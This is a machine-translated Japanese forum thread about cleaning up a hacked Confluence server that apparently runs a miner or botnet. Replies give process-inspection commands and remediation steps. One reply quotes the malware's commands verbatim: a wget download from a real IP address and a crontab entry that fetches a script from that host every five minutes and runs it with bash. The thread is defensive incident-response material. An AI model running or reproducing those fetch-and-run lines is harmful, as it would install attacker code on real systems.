サーバーがハッキングされているようです。プロセス リストをよく見てください。 ps auxc を実行 プロセス バイナリ ソースを見てみましょう。
rkhunter などのツールを使用してサーバーをスキャンできますが、一般的には、最初に confluence ユーザーとしてランチングされたすべてのものを強制終了し、サーバー/アカウントをスキャンし、confluence をアップグレードし (ほとんどの場合、ユーザーが攻撃元を特定します)、確認する必要があります。追加のアカウントなどの合流点で
そのプロセスの内容を確認したい場合は、/proc をご覧ください。 ls -la /proc/996 で .そこにもソースバイナリが表示されます。 strace -ff -p 996 ランチもできます どのプロセスが実行されているか、または cat /proc/996/exe | strings を確認するには バイナリに含まれる文字列を確認します。これはおそらく、ある種のボットネットの一部、マイナーなどです。
私は同じ問題を抱えていました。ハッキングされました。ウイルス スクリプトは /tmp にあり、コマンド「top」からスクリプト名を見つけて (無意味な文字、「fcbk6hj」の名前は私のものでした。)、プロセスを強制終了します (おそらく 3 つのプロセス)
ルート 3158 1 0 15:18 ? 00:00:01 ./fcbk6hj ./jd8CKglroot 3159 1 0 15:18 ? 00:00:01 ./fcbk6hj ./5CDocHlroot 3160 1 0 15:18 ? 00:00:11 ./fcbk6hj ./prot
それらをすべて kill して /tmp/prot を削除し、CPU のバックである /boot/vmlinuz のプロセスを kill します。
ウイルスがスクリプトを /tmp に自動的にダウンロードしていることがわかったので、私の方法は mv wgetak を別の名前にしました。
ウイルスの挙動:wgetak -q http://51.38.133.232:80/86su.jpg -O ./KC5GkAo
次のタスクが crontab に書き込まれていることがわかりました。削除してください:*/5 * * * * /usr/bin/wgetak -q -O /tmp/seasame http://51.38.133.232:80 &&bash /tmp/seasame
これをシステムと crontab から削除した後、(少なくとも今のところ) confluence ユーザーを /etc/cron.deny に追加することをお勧めします。 .
その後:
$ crontab -e
You (confluence) are not allowed to use this program (crontab)
See crontab(1) for more information